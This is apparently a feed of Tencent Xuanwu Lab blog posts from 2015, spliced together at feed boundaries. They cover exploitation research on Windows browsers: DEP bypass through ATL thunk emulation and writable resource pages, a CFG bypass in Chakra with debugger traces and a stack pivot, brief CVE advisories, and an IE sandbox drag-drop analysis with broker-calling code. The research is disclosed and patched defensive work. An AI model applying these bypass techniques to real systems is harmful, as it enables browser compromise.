0363b0f0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363b648: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bab8: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bb78: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+28c0 (69c71564)
0363bbc0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+2898 (69c7150f)
0363bc44: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+276a (69d0dedd)
0363c588: MSHTML!_except_handler4+0 (66495fa4)
  CRT scope  0, filter: MSHTML! ... Omitted... (6652bbe8) 
                func:   MSHTML!... Omitted... (6652bbf1)
0363c62c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, func:   user32!UserCallWinProcCheckWow+123 (75664456)
0363c68c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, filter: user32!DispatchMessageWorker+15e (756659b7)
                func:   user32!DispatchMessageWorker+171 (756659ca)
0363f9a8: ntdll!_except_handler4+0 (776a71f5)
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (776a74d0)
                func:   ntdll!__RtlUserThreadStart+63 (776a90eb)
0363f9c8: ntdll!FinalExceptionHandler+0 (776f7428)

In the above exception handler chain, the exception handler in mshtml.dll will call kernel32!RaiseFailFastException(). If g_fFailFastHandlerDisabled is set to false, the process will be terminated:

int __thiscall RaiseFailFastExceptionFilter(int this) {
  signed int **v1; // esi@1
  CONTEXT *v2; // ST04_4@2
  signed int v3; // eax@2
  UINT v4; // ST08_4@4
  HANDLE v5; // eax@4

  v1 = (signed int **)this;
  if ( !g_fFailFastHandlerDisabled )
    v2 = *(CONTEXT **)(this + 4);
    g_fFailFastHandlerDisabled = 1;
    RaiseFailFastException(*(PEXCEPTION_RECORD *)this, v2, 2u);
    v3 = 1653;
    if ( *v1 )
      v3 = **v1;
    v4 = v3;
    v5 = GetCurrentProcess();
    TerminateProcess(v5, v4);
  return 0;

However, if g_fFailFastHandlerDisabled is set to true, the exception handling chain will call into kernel32!UnhandledExceptionFilter(), and finally kernel32!CheckForReadOnlyResourceFilter():

int __stdcall CheckForReadOnlyResourceFilter(int a1) {
  int result; // eax@2

  if ( BasepAllowResourceConversion )
    result = CheckForReadOnlyResource(a1, 0);
    result = 0;
  return result;

If BasepAllowResourceConversion is also true, CheckForReadOnlyResource() will set the target page to writable, and return normally.

That is, if we first modify g_fFailFastHandlerDisabled and BasepAllowResourceConversion flag to true, we can then directly modify the resource in ieframe.dll without worrying about read-only attributes, the operating system will take care of it for us.

Another small obstacle. Once page attribute modification is triggered in CheckForReadOnlyResource(), the RegionSize of the memory attribute will also be change to one page size, usually 0x1000. Before IE create renderer instances with HTML resources in ieframe.dll, mshtml!GetResource() checks if the RegionSize attribute is larger than the size of the resource, and fails otherwise. The solution is to completely overwrite the resource from start to end, the RegionSize will increase accordingly and the check is therefore bypassed.

We now have a surreal exploit thanks to the special case for PE resource section in Windows write exception.

0x02 Executing the unexecutable memory locations

In my VARA 2009 talk “Time Factors in Vulnerability Hunting” I introduced a rare module address use-after-free vulnerability. For example, Thread A calls a function in module X, module X in turn calls a time consuming function in module Y. if thread B unloads module X before the function call returns, the return address is invalid when the function call returns. I found such problems in Flash module of the Opera browser at that time. One of the download managers also had similar problems.

Some other vulnerability categories also exhibit similar properties – execution is possible but the address is not controllable. In environments without DEP, these kind of vulnerabilities are not hard to exploit – we only need to spray the code to the target address. But with DEP enabled, these vulnerabilities are usually considered unexploitable.

But if we spray the target address with the following data:

typedef struct _THUNK3 {
    UCHAR MovEdx;       // 0xba         mov edx, imm32
    LONG EdxImmediate; 
    UCHAR MovEcx;       // 0xb9         mov ecx, imm32
    LONG EcxImmediate; // <- put your Stack Pivot here
    USHORT JmpEcx;      // 0xe1ff       jmp ecx
} Thunk3;

With DEP enabled, the target memory location is no doubt unexecutable, but surprisingly the system seems still executed these instructions, and jumped to the location in ecx. We only need to set ecx to jump to arbitrary memory location and execute the ROP chain.

For compatibility reasons, Windows implemented a mechanism called ATL thunk emulation. When the Windows kernel is handling execution exceptions, it checks if the exception address looks like a ATL thunk. If so, the kernel emulate its execution with KiEmulateAtlThunk() routine.

There are some limitations. ATL thunk emulation checks if the target address is within a PE file, and CFG checks are also enforced on supported systems. After Windows Vista, ATL thunk emulation only applies to applications compiled without IMAGE_DLLCHARACTERISTICS_NX_COMPAT under default DEP policy. If /NXCOMPAT is specified in compiler flag, the ATL thunk emulation is no longer supported. But there are still a lot of programs that does support the ATL thunk emulation, as seen in many third party application, and 32-bit iexplore.exe. Vulnerability such as CVE-2015-2425 in Hacking Team leaked emails is also exploitable with this technique if a heap spray is successful.

By abusing the ATL thunk emulation in system exception handling procedure, we make the unexcutable executable again, and bring some unexploitable vulnerabilities back to life.

Majority of this article was written in October 2014. Module addresses and symbol information were from Windows Technical Preview 6.4.9841 x64 with Internet Explorer 11.


[1] ROPs are for the 99%, CanSecWest 2014, Yang Yu
[2] Bypassing Browser Memory Protections
[3] (CVE-2015-2425) “Gifts” From Hacking Team Continue, IE Zero-Day Added to Mix
[4] Time Factors in Vulnerability Hunting,VARA 2009

Use Chakra engine again to bypass CFG http://xlab.tencent.com/en/2016/01/04/use-chakra-engine-again-to-bypass-cfg/ Mon, 04 Jan 2016 08:19:56 +0000 http://xlab.tencent.com/en/?p=84 Continue reading "Use Chakra engine again to bypass CFG"]]>

This post is initially inspired by a talk with @TK, during which I learned the process and detail on how to successfully bypass CFG (reference: use Chakra JIT to bypass DEP and CFG). Due to my interest in its technology, I spent some time reading related materials and found another position to bypass CFG. I would like to thanks @TK for enlightening me on the ideas and techniques mentioned in this post.

There are plenty of articles that focus on the analysis of CFG, if you are interested, you may refer to my previous speech on HitCon 2015(《spartan 0day & exploit》). To be clear, this post is the part that is not revealed in my speech. At this point, the method to implement arbitrary code execution on edge through a write to memory is completely revealed.

0x01 the function calling logic of Chakra

When the chakra engine calls a function, it will conduct different process based on different function status, for example, the function called first time, the function called multi-times, DOM interface function an the function compiled by jit. Different types of functions have different processing flow, but all processing will be achieved by the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function through calling the Js::JavascriptFunction::CallFunction<1> function.

1.the first call and the multiple calls of a function

When the following script is called, the function Js::JavascriptFunction::CallFunction<1> will be called by Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >.

function test(){}


If the function is called for the first time, the execution flow will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >

If the function is called again, the calling process will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >

These two calling flows are almost identical. The mainly difference is when the function is called the first time, it has to use the DeferredParsingThunk function to resolve it. This design is for high efficiency. But the subsequent call will directly execute it.

By analysis, the sub function called by Js::JavascriptFunction::CallFunction<1> is obtained through the data in the Js::ScriptFunction object. The functions called subsequently Js::JavascriptFunction::DeferredParsingThunk and NativeCodeGenerator::CheckCodeGenThunk are both included in the Js::ScriptFunction object. Here are the differences of Js::ScriptFunction in two different calls.

The object Js::ScriptFunction called the first time:

0:010> u poi(06eaf050 )

0:010> dd 06eaf050 
06eaf050  5f695580 06eaf080 00000000 00000000

0:010> dd poi(06eaf050+4) 
06eaf080  00000012 00000000 06e26c00 06e1fea0
06eaf090  5f8db3f0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)

The object Js::ScriptFunction called the second time:

0:010> u poi(06eaf050 )

0:010> dd 06eaf050 
06eaf050  5f695580 1ce1a0c0 00000000 00000000

0:010> dd poi(06eaf050+4)
1ce1a0c0  00000012 00000000 06e26c00 06e1fea0
1ce1a0d0  5f8db9e0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)

So the differences between the first call and the subsequent calls are achieved by changing the function pointer in the Js::ScriptFunction object.

2.jit of the function

Next we’ll look at the jit of the function. Here is the script code for test, which triggers its jit through multiple calling the test1 function.

function test1(num)
    return num + 1 + 2 + 3;

//trigger jit


The Js::ScriptFunction object that goes through jit.

//new debug, the memory address of the object will be different

0:010> u poi(07103050 )

0:010> dd 07103050 
07103050  5f695580 1d7280c0 00000000 00000000

0:010> dd poi(07103050+4)
1d7280c0  00000012 00000000 07076c00 071080a0
1d7280d0  0a510600 00000000 5fb0b454 00000101

0:010> u poi(poi(07103050+4)+0x10)          //jit code
0a510600 55              push    ebp
0a510601 8bec            mov     ebp,esp
0a510603 81fc5cc9d005    cmp     esp,5D0C95Ch
0a510609 7f21            jg      0a51062c
0a51060b 6a00            push    0
0a51060d 6a00            push    0
0a51060f 68d0121b04      push    41B12D0h
0a510614 685c090000      push    95Ch
0a510619 e802955b55      call    chakra!ThreadContext::ProbeCurrentStack2 (5fac9b20)
0a51061e 0f1f4000        nop     dword ptr [eax]
0a510622 0f1f4000        nop     dword ptr [eax]
0a510626 0f1f4000        nop     dword ptr [eax]
0a51062a 6690            xchg    ax,ax
0a51062c 6a00            push    0
0a51062e 8d6424ec        lea     esp,[esp-14h]
0a510632 56              push    esi
0a510633 53              push    ebx
0a510634 b8488e0607      mov     eax,7068E48h
0a510639 8038ff          cmp     byte ptr [eax],0FFh
0a51063c 7402            je      0a510640
0a51063e fe00            inc     byte ptr [eax]
0a510640 8b450c          mov     eax,dword ptr [ebp+0Ch]
0a510643 25ffffff08      and     eax,8FFFFFFh
0a510648 0fbaf01b        btr     eax,1Bh
0a51064c 83d802          sbb     eax,2
0a51064f 7c2f            jl      0a510680
0a510651 8b5d14          mov     ebx,dword ptr [ebp+14h] //ebx = num
0a510654 8bc3            mov     eax,ebx        //eax = num (num << 1 & 1)
0a510656 d1f8            sar     eax,1          //eax = num >> 1
0a510658 732f            jae     0a510689
0a51065a 8bf0            mov     esi,eax
0a51065c 8bc6            mov     eax,esi
0a51065e 40              inc     eax            //num + 1
0a51065f 7040            jo      0a5106a1
0a510661 8bc8            mov     ecx,eax
0a510663 83c102          add     ecx,2          //num + 2
0a510666 7045            jo      0a5106ad
0a510668 8bc1            mov     eax,ecx
0a51066a 83c003          add     eax,3          //num + 3
0a51066d 704a            jo      0a5106b9
0a51066f 8bc8            mov     ecx,eax
0a510671 d1e1            shl     ecx,1          //ecx = num << 1
0a510673 7050            jo      0a5106c5
0a510675 41              inc     ecx            //ecx = num += 1
0a510676 8bd9            mov     ebx,ecx
0a510678 8bc3            mov     eax,ebx
0a51067a 5b              pop     ebx
0a51067b 5e              pop     esi
0a51067c 8be5            mov     esp,ebp
0a51067e 5d              pop     ebp
0a51067f c3              ret

The pointer to NativeCodeGenerator::CheckCodeGenThunk in the Js::ScriptFunction object is changed to a pointer to jit code after jit. The implementation directly called the jit code.

Simply speaking, when the called function passes it parameters, it first rotates one bit left, and pass the values after the lowest bit 1(parameter = (num << 1) & 1). So the first thing to do after getting the parameter is to rotate one bit right to get the original parameter value. As for why, I suppose it’s caused by the garbage collection mechanism of the script engine, which separates object and data by the lowest bit.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
        |-jit code

When calling the jit function, the calling stack is as the above, this is the method that chakra engine uses to call the jit function.

3.DOM interface function

To cover everything, there is another kind of function to mention, that’s DOM interface function, a function provided by other engines, such as the rendering engine (theoretically it can be other engines as will).


On execution, the above script will use the following function calling process, until call the engine that provides the interface function.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
        |-chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk //call dom interface function
            |-dom_interface_function    //EDGEHTML!CFastDOM::CDocument::Trampoline_createElement

When calling the interface function, the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function and the function object used in the subsequent process differ from the ones used previously, it is the Js::JavascriptExternalFunction object. Then similar to the previosfunction call, it also resolves the function pointer in their subject and calls it; finally it enters the wanted DOM interface function.

0:010> u poi(06f2cea0)

0:010> dd 06f2cea0 
06f2cea0  5f696c4c 06e6f7a0 00000000 00000000

0:010> dd poi(06f2cea0+4)
06e6f7a0  00000012 00000000 06e76c00 06f040a0
06e6f7b0  5f8c6130 00000000 5fb0b454 00000101

0:010> u poi(poi(06f2cea0+4)+0x10)

These are the different call methods that chakra engine uses to call different types of functions.

0x02 Exploit and Exploitation

After describing the call methods for all sorts of chakra engines, now we’ll check out the very important cog vulnerability. As mentioned above, the first calling process differs from the sub sequent ones. Let’s look at the logic here; the following is the call stack:

//the first call
chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
            |-chakra!Js::JavascriptFunction::DeferredParse    //obtain NativeCodeGenerator::CheckCodeGenThunk function

What is not mentioned above is the Js::JavascriptFunction::DeferredParse function in the above process. Function resolution related work is conducted in this function, and this function returns the pointer value of NativeCodeGenerator::CheckCodeGenThunk, then returns Js::JavascriptFunction::DeferredParsingThunk and calls it. The pointer of NativeCodeGenerator::CheckCodeGenThunk is also obtained through resolving the Js::JavascriptFunction object. Here is the code.

int __cdecl Js::JavascriptFunction::DeferredParsingThunk(struct Js::ScriptFunction *p_script_function)
  NativeCodeGenerator_CheckCodeGenThunk = Js::JavascriptFunction::DeferredParse(&p_script_function);
  return NativeCodeGenerator_CheckCodeGenThunk();
.text:002AB3F0 push    ebp
.text:002AB3F1 mov     ebp, esp
.text:002AB3F3 lea     eax, [esp+p_script_function]
.text:002AB3F7 push    eax             ; struct Js::ScriptFunction **
.text:002AB3F8 call    Js::JavascriptFunction::DeferredParse
.text:002AB3FD pop     ebp
.text:002AB3FE jmp     eax

On this jump position, no CFG check is made on the function pointer in eax. Therefore, this can be used to hijack the eip. But first you need to know how the function pointer NativeCodeGenerator::CheckCodeGenThunk returned by the Js::JavascriptFunction::DeferredParse function is resolved through the Js::ScriptFunction object. Here is the resolution process.

0:010> u poi(070af050)

0:010> dd 070af050 + 14
070af064  076690e0 5fb11ef4 00000000 00000000

0:010> dd 076690e0 + 10
076690f0  076690e0 04186628 07065f90 00000000

0:010> dd 076690e0 + 28
07669108  07010dc0 000001a8 00000035 00000000

0:010> dd 07010dc0 
07010dc0  5f696000 05a452b8 00000000 5f8db9e0

0:010> u 5f8db9e0

As shown above, Js::JavascriptFunction::DeferredParse gets the NativeCodeGenerator::CheckCodeGenThunk function pointer by resolving the Js::ScriptFunction object, the resolving method is abbreviated as [[[Js::ScriptFunction+14]+10]+28]+0c. So just by forging the data in this memory, it can trigger the call of Js::JavascriptFunction::DeferredParse by calling the function, further to hijack the eip, as shown below.

0:010> g
Breakpoint 0 hit
eax=603ba064 ebx=063fba10 ecx=063fba40 edx=063fba40 esi=00000001 edi=058fc6b0
eip=603ba064 esp=058fc414 ebp=058fc454 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
chakra!`dynamic initializer for 'DOMFastPathInfo::getterTable''+0x734:
603ba064 94              xchg    eax,esp
603ba065 c3              ret

By this way, cfg is bypassed and eip is hijacked. This method is simple and stable. It’s convenient to use when you get access to read and write the memory. This exploit has been reported to Microsoft on 25th July, 2015.

0x03 Mitigation

Microsoft has fixed all the exploits in this post. The mitigation plan is relatively easy, which is to add cft check at this jump.

.text:002AB460 push    ebp
.text:002AB461 mov     ebp, esp
.text:002AB463 lea     eax, [esp+arg_0]
.text:002AB467 push    eax
.text:002AB468 call    Js::JavascriptFunction::DeferredParse
.text:002AB46D mov     ecx, eax        ; this
.text:002AB46F call    ds:___guard_check_icall_fptr  //add cfg check
.text:002AB475 mov     eax, ecx
.text:002AB477 pop     ebp
.text:002AB478 jmp     eax


  1. 《Bypass DEP and CFG using JIT compiler in Chakra engine》

  2. 《spartan 0day & exploit》

Microsoft Internet Explorer And Microsoft Edge Object Use-After-Free Remote Code Execution Vulnerability http://xlab.tencent.com/en/2015/12/29/xlab-15-025/ Tue, 29 Dec 2015 09:59:19 +0000 http://xlab.tencent.com/en/?p=50 Continue reading "Microsoft Internet Explorer And Microsoft Edge Object Use-After-Free Remote Code Execution Vulnerability"]]> XLAB ID: XLAB-15-025     

CVE ID: CVE-2015-1752     

Patch Status: Fixed

Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer and Microsoft Edge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. An attacker can leverage this vulnerability to execute code under the context of the current process.

Disclosure Timeline:

2015/03/05 provide vulnerability detail to Microsoft Security Response Center via secure@microsoft.com
2015/04/01 Microsoft Security Response Center automatic reply
2015/06/09 Microsoft Security Response Center assigned CVE-ID CVE-2015-1752

This vulnerability was discovered by:   exp-sky

Flash Player Memory Corruption in Display List Handling http://xlab.tencent.com/en/2015/12/29/xlab-15-024/ Tue, 29 Dec 2015 09:56:34 +0000 http://xlab.tencent.com/en/?p=48 Continue reading "Flash Player Memory Corruption in Display List Handling"]]> XLAB ID: XLAB-15-024     

CVE ID: CVE-2015-8459     

Patch Status: Fixed

Vulnerability Details:
The specific flaw exists within handling of display list. By maniuplating DisplayObject’s properties attacker can force memory corruption occuring in flash player. An attacker can leverage this vulnerability to execute code under the context of the current process.

Disclosure Timeline:

2015/07/13 Provide vulnerability detail to Adobe via psirt@adobe.com
2015/07/16 Adobe responded that they had opened case PSIRT-3929 for the issuse
2015/12/28 Adobe responded that they had assigned CVE-2015-8459 to the issue

This vulnerability was discovered by:   kai kang

Drag & Drop Security Policy of IE Sandbox http://xlab.tencent.com/en/2015/12/18/drag-drop-security-policy-of-ie-sandbox/ Fri, 18 Dec 2015 11:03:51 +0000 http://xlab.tencent.com/en/?p=82 Continue reading "Drag & Drop Security Policy of IE Sandbox"]]>

There is a kind of vulnerability that uses the flaw of whitelist applications in ElevationPolicy settings to accomplish sandbox bypass. A DragDrop policy setting similar to ElevationPolicy in the IE registry attracts our attention. In this post, the writer will try every possible means to break IE sandbox from the perspective of an attacker by analyzing all obstacles ahead to detail the drag drop security policy of IE sandbox.

0x01 DragDrop Policy of IE sandbox

Among all IE sandbox bypass techniques, there’s one that uses the issue of whitelist applications in ElevationPolicy to execute arbitrary code. In the registry, there is a configuration called DragDrop similar to ElevationPolicy. The specific registry path is:

HKLM\Software\Microsoft\Internet Explorer\Low Rights\DragDrop

As shown in the figure:

Here are the meanings for values of the DragDrop policy:

0: If the target window is not valid DropTarget, reject;

1: If the target window is valid DropTarget, but cannot copy contents;

2: Use popup to ask for user’s permission. If allowed, copy contents; to the target window;

3: Allow silent drag drop.

In a clean Windows 8.1, there are 3 applications under the DragDrop directory by default: iexplore.exe, explorer.exe, notepad.exe. The policy value for each is 3. When the policy value of the target application is 2 and drag a file to the target window, IE would pop up a prompt like this:

0x02 DragDrop Issue for the Explorer process

When drag files from IE to Explorer, although the DragDrop policy value is set to 3, IE won’t pop up anything, but the Explorer process will pop a prompt like this:

Of course, when we drag files from IE to the tree folder structure of Explorer’s sidebar, no prompt will pop up. This may be an imperfection in the implementation of the Explorer application. In second thought, if we can simulate mouse operations of drag and drop in IE sandbox, we’ll be able to use this Explorer issue to cross the security boundary of the IE sandbox.

0x03 Finish OLE Drag Drop without the Mouse

OLE dragdrop is a generic file dragging method. It uses the design for OLE interface to implement the drag and drop operations, making it generic and modular. The OLE dragdrop technique includes three basic interfaces:

  • IDropSource Interface: represents the source object where the dragdrop operation is issued, implemented by source object;

  • IDropTarget Interface: represents the target object on which the dragdrop operation is taken, implemented by target object;

  • IDataObject Interface: represents the data transferred during the dragdrop operation, implemented by source object;

This figure describes the key components required by a complete OLE dragdrop operation:

To simulate the drag and drop operations of a mouse, all we need is to implement IDropSourceinterface and IDataObject interface. The core of normal OLE dragdrop operation is to call the ole32!DoDragDrop function, here is the function prototype:

IDataObject*pDataObject,   // Pointer to the data object
IDropSource *pDropSource,   // Pointer to the source
   DWORD     dwOKEffect,    // Effects allowed by the source
   DWORD     *pdwEffect      // Pointer to effects on the source

Information on the source object and data of dragdrop operation is included in parameters of DoDragDrop. Within the DoDragDrop function, it uses the position of the mouse pointer to obtain information about the source object. In the following, the writer gives a method that uses code emulator instead of mouse to achieve dragdrop operation.

To simulate the dragdrop operation from a mouse by using code emulator, that is to isolate the GUI operation part from the DoDragDrop function, find the function that does dragdrop operation, pass the required parameter to it to finish the operation. In the case of ole32.dll 6.1.7601.18915 in Win7, I’ll illustrate the internal implementation of DragDrop.

Here is the main logic of Ole32!DoDragDrop:

HRESULT __stdcallDoDragDrop(LPDATAOBJECT pDataObj, LPDROPSOURCE pDropSource, DWORD dwOKEffects, LPDWORD pdwEffect)
    HRESULT hr;

    CDragOperation::CDragOperation(drgop, pDataObj, pDropSource, dwOKEffects, pdwEffect, hr);
    if ( hr= 0 ){
      while ( CDragOperation::UpdateTarget(drgop)
        CDragOperation::HandleMessages(drgop) )
        hr = CDragOperation::CompleteDrop(drgop);

    return hr;

CDragOperation::CDragOperation is a constructed function. Its important initial operations include:


The next While loop will determine the dragdrop status. At last, CompleteDrop will complete the operation, the key function call is like this:


As it can be seen, it’s the ole32!PrivDragDrop function that finally does the dragdrop operation, by using the hardcoded offset of the function address to call the internal function in ole32.dll. We define a DropData function to simulate the dropdrag operation from the mouse, the input parameters of which are the target windows handle and the IDataObject pointer of the file being dragged, the main logic is as follows:

auto DropData(HWND hwndDropTarget, IDataObject* pDataObject)
    void *DOBuffer = nullptr;
    HRESULT result = GetMarshalledInterfaceBuffer(IID_IDataObject, pDataObject, DOBuffer);

    if (SUCCEEDED(result)){
        DWORD dwEffect = 0;
        POINTL ptl = { 0, 0 };
        void *hDDInfo = nullptr;
        HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_ENTER, DOBuffer, pDataObject, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
        if (SUCCEEDED(result)){
            HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_OVER, 0, 0, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
            if (SUCCEEDED(result)){
                HWND hClip = GetPrivateClipboardWindow(CLIP_QUERY);
                HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_DROP, DOBuffer, pDataObject, 0, ptl, dwEffect, hClip, hDDInfo);
    return result;

The target window handle can be obtained through the FindWindow function. There are two methods to pack a DataObject and get the pointer of its IDataObject interface:

  • Write your own C++ class to implement the IDataObject interface;

  • Use the existing implementation in the class library, for instance, both MFC and Shell32 provide related class to implement the DragDrop interface.

The writer explains how to use MFC class library to pack a DataObject and get the pointer of its IDataObject interface, here is the implementation code:

auto GetIDataObjectForFile(CStringfilePath)
    COleDataSource* pDataSource = new COleDataSource();
    IDataObject*    pDataObject;
    UINT            uBuffSize = 0;
    HGLOBAL         hgDrop;
    DROPFILES*      pDrop;
    TCHAR*          pszBuff;

    uBuffSize = sizeof(DROPFILES) + sizeof(TCHAR) * (lstrlen(filePath) + 2);
    hgDrop = GlobalAlloc(GHND | GMEM_SHARE, uBuffSize);
    if (hgDrop != nullptr){
        pDrop = (DROPFILES*)GlobalLock(hgDrop);
        if (pDrop != nullptr){
            pDrop-pFiles = sizeof(DROPFILES);
#ifdef _UNICODE
            pDrop-fWide = TRUE;
            pszBuff = (TCHAR*)(LPBYTE(pDrop) + sizeof(DROPFILES));
            lstrcpy(pszBuff, (LPCTSTR)filePath);
            pDataSource-CacheGlobalData(CF_HDROP, hgDrop, fmtetc);
            pDataObject = (IDataObject *)pDataSource-GetInterface(IID_IDataObject); 
            pDataObject = nullptr;
        pDataObject = nullptr;
    return pDataObject;

0x04 Drag Drop Implementation of IE Sandbox

When we use mouse to does the dragdrop operation in IE sandbox, the IE tab process in the sandbox will transfer data to the main process outside the sandbox through ShdocvwBroker. That’s to say, the actual dragdrop operation is completed in the IE main process outside of the sandbox. The function calls for the two processes are almost like the following:

IE sub process (inside the sandbox):

    -- … send ALPC message to OE main process

IE main process:

… receive the ALP message from IE sub process

0x05 Security Limits that IE Sandbox Applies to the Drag Drop Operation

In IE sandbox, we can directly call the function in Broker. By building an IEUserBroker and using the IEUserBroker to build an ShdocvwBroker, we will be able to call the IEFRAME!CShdocvwBroker::PerformDoDragDrop function in the main process. The calling method is like the following:

typedef HRESULT(__stdcall *FuncCoCreateUserBroker)(IIEUserBroker **ppBroker);
    HMODULE hMod = LoadLibraryW(Liertutil.dll);
    CoCreateUserBroker = (FuncCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
    if (CoCreateUserBroker)
        IIEUserBrokerPtr broker;
        HRESULT ret = CoCreateUserBroker(broker);
        return broker;
    return nullptr;

IIEUserBrokerPtr broker = CreateIEUserBroker();
IShdocvwBroker* shdocvw;
broker-BrokerCreateKnownObject(clsid_CIERecoveryStore, _uuidof(IRecoveryStore), (IUnknown**)shdocvw);
shdocvw-PerformDoDragDrop(HWND__ *,IEDataObjectWrapper *,IEDropSourceWrapper *,ulong,ulong,ulong *,long *);

The DragDrop function is eventually by calling the ole32!DoDragDrop function, all the parameters that DoDragDrop requires can be passed by the PerformDoDragDrop function(refer to the parameter information of the DoDragDrop function mentioned in chapter 0x03). At this time, we already can walk through inside the sandbox to the outside ole32!DoDragDrop function and pass the controllable parameters. However, there are two principles to simulate the dragdrop operation of a mouse:

  • Use the method mentioned in chapter 0x02 to directly call the internal function in ole32.dll;

  • Call API to change the position of the mouse.

For the first method, since we are in the sandbox, we can only use the proxy for Broker interface to get out of the sandbox and get in the process space for the IE main process. So we cannot call the internal function of the dell in the main process, further, this method is not feasible.

The second method, if we can change the position of the mouse, then inside the ole32!DoDragDrop function, we can use mouse position to get information on the target window. However, during experiment, we notice that it’s not possible to change mouse position through API inside the sandbox. The next case will illustrate this problem.

The writer can think of two ways to change the mouse position:

1.Simulate mouse movements through the SendInput function. The following shows the calling connection of the SendInput function from user mode to kernel mode:


2.Change mouse position through the SetCursorPos function. The following shows the calling connection of the SetCursorPos function from user mode to kernel mode:


First is SendInput, if directly calling the SendInput function in IE sandbox, it returns 0x5 access denied error, because the SendInput function is hooked in IEShims.dll and the hook function is processed. The specific function position requires processing is:

This hook is easy to bypass, we’ll directly call NtUserSendInput, but this function has no export, that’s why it’s required to hardcode its address through function offset. Directly calling the NtUserSendInput function, it returns no error, but the position of the mouse doesn’t change. Because the failure of the call is caused by the limits of UIP(User Interface Privilege Isolation). It’s the same when calling the SetCursorPos function.

UPI is a new security feature since Windows Vista, it’s implemented in the Windows kernel, and the specific position is as the following:


In Win8.1, this is the logic of the function:

signed int __stdcall CheckAccessForIntegrityLevelEx(
            unsigned int CurrentProcessIntegrityLevel, 
            int          CurrentIsAppContainer, 
            unsigned int TargetProcessIntegrityLevel, 
            int          TargetIsAppContainer)
    signed int result;
    if (gbEnforceUIPICurrentProcessIntegrityLevelTargetProcessIntegrityLevel )
        result = 0;
    esle if ( gbEnforceUIPICurrentProcessIntegrityLevel == TargetProcessIntegrityLevel )
        result = (CurrentIsAppContainer == TargetIsAppContainer || 
                  TargetIsAppContainer == -1 || 
                  CurrentIsAppContainer == -1) || 
        result = 1;
    return result;

This function will first determine the integrity level of the source process and the target process. If the integrity level of the source process is lower than that of the target process, reject; if the integrity level of the source process is higher than that of the target process, permit. Next it determines the property of AppContainer. If it equals to the integrity of the source process and is running in AppContainer, then determine if the two satisfy the limits by the SeIsParentOfChildAppContainer function. If it satisfies, permit; if not, reject.

Note: parameters, such as, ProcessIntegrityLevel and IsAppContainer, are extracted from the EPROCESS-Win32Process structure, this is an internal structure. SeIsParentOfChildAppContainer is an internal function in ntoskrnl.

0x06 Summary

This post details the security policy that IE sandbox applies to dragdrop operation, which analyzes the limits policy of IE sandbox for the dragdrop operation, the problems that the Explore process has on dragdrop, the internal principle how ole32.dll implement the dragdrop and how IE implements the dragdrop operation in the sandbox, as well as the position and implementation detail the security limits are put. IE sandbox usually applies effective security limits on the dragdrop operation by hooking specific function in IEShims.dll and the UPI feature in Windows (later than Windows Vista).

0x07 Reference

  1. Understanding and Working in Protected Mode Internet Explorer

  2. OLE Drag and Drop

  3. How to Implement Drag and Drop between Your Program and Explorer


0x08 Acknowledgement

Thanks Wins0n for helping me with ole32 reversing and FlowerCode for helping with my thoughts and solving difficulties.

Translated by WooYun Drops.
Bypass DEP and CFG using JIT compiler in Chakra engine http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/ Wed, 09 Dec 2015 05:19:41 +0000 http://xlab.tencent.com/en/?p=80 Continue reading "Bypass DEP and CFG using JIT compiler in Chakra engine"]]>

JIT Spray is a popular exploitation technique first appeared in 2010. It embeds shellcode as immediate value into the executable code the JIT compiler generates. Currently, all major JIT engine, including Chakra, already have many mitigations in place against this technique, such as random NOP instruction insertion, constant blinding, etc.

This article points out two weaknesses in Chakra’s JIT Spray mitigation (in Windows 8.1 and older operating systems, and Windows 10, respectively), allowing attackers to use JIT Spray to execute shellcode, bypassing DEP. I will also discuss a method to bypass CFG using Chakra’s JIT compiler.

0x01 Constant Blinding

